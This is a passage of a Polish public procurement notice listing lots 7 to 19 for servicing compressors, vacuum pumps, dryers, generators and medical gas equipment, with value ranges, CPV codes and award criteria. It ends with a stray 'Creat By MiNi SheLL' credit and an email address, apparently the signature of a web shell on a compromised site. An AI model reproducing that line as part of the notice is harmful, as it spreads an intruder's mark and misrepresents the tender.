<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy sprężarek śrubowych typ L05 i L07
Szacunkowa wartość zamówienia powyżej 100000,00 PLN netto poniżej 115000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.13.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7: Przeglądy i naprawy sprężarek typ Kaeser SX-4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy sprężarek typ Kaeser SX-4
Szacunkowa wartość zamówienia powyżej 38000,00 PLN netto poniżej 48000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.13.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8: Przeglądy i naprawy pomp próżniowych typ AT100A, 100B i 63.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy pomp próżniowych typ AT100A, 100B i 63
Szacunkowa wartość zamówienia powyżej 47000,00 PLN netto poniżej 57000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9: Przeglądy i naprawy pomp próżniowych typ PW4.23 i PW4.24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy pomp próżniowych typ PW4.23 i PW4.24
Szacunkowa wartość zamówienia powyżej 40000,00 PLN netto poniżej 55000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10: Przegląd sprężarek typ L07 i L22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd sprężarek typ L07 i L22
Szacunkowa wartość zamówienia powyżej 8500,00 PLN netto poniżej 15000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.13.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11: Przeglądy osuszaczy absorpcyjnych typ BAH101 z katalizatorem i osuszacz 
typ BA-A9xSDS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy osuszaczy absorpcyjnych typ BAH101 z katalizatorem i osuszacz 
typ BA-A9xSDS
Szacunkowa wartość zamówienia powyżej 27000,00 PLN netto poniżej 37000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.13.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12: Przeglądy i naprawy zestawów pompowych typ SM302 i ZA-2-450.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy zestawów pompowych typ SM302 i ZA-2-450
Szacunkowa wartość zamówienia powyżej 7000,00 PLN netto poniżej 16000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13: Przeglądy i naprawy agregatów prądotwórczych typ Gs550s.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy agregatów prądotwórczych typ Gs550s
Szacunkowa wartość zamówienia powyżej 27000,00 PLN netto poniżej 35000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.23.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14: Przeglądy i naprawy zestawów  HYDRO-2000.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy zestawów  HYDRO-2000
Szacunkowa wartość zamówienia powyżej 22000,00 PLN netto poniżej 32000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.21.51.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15: Przeglądy i naprawy urządzeń stanu gazów medycznych typ STARLET.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy urządzeń stanu gazów medycznych typ STARLET
Szacunkowa wartość zamówienia powyżej 50000,00 PLN netto poniżej 59000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.21.51.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16: Przeglądy i naprawy urządzeń stanu gazów medycznych typ GAZMED.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy urządzeń stanu gazów medycznych typ GAZMED
Szacunkowa wartość zamówienia powyżej 20000,00 PLN netto poniżej 30000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.21.51.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17: Przeglądy urządzeń stanów gazów medycznych typ PSG3 INSMED.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy urządzeń stanów gazów medycznych typ PSG3 INSMED
Szacunkowa wartość zamówienia powyżej 3000,00 PLN netto poniżej 8000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0, 45.21.51.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18: Przeglądy i naprawy osuszaczy absorpcyjnych A12x i osuszaczy ziębniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeglądy i naprawy osuszaczy absorpcyjnych A12x i osuszaczy ziębniczych
Szacunkowa wartość zamówienia powyżej 38000,00 PLN netto poniżej 45000,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 19: Przegląd zestawów hydroforowych firmy Instalcompact.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd zestawów hydroforowych firmy Instalcompact
Szacunkowa wartość zamówienia powyżej 1500,00 PLN netto poniżej 2500,00 PLN netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.51.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2014.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com